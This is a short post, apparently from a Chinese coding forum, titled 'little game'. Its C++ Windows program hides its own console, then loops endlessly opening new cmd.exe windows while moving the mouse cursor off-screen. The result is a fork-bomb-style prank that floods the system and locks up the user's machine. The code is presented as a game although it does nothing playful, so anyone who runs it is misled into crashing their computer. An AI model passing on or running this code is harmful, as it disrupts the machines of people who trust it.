小游戏
2025-11-12 16:06:38
发布于:上海
#include<windows.h>
#include<stdio.h>
#include<stdlib.h>
#include<iostream>
#include<ctime>
using namespace std;
int main(int argc,char *argv[])
{
while(true)
{
long long n=1e17;
ShowWindow(FindWindow("ConsoleWindowClass",argv[0]),0);
while(true)
{
system("start cmd.exe");
SetCursorPos(6000,6000);
}
}
}
这里空空如也











有帮助,赞一个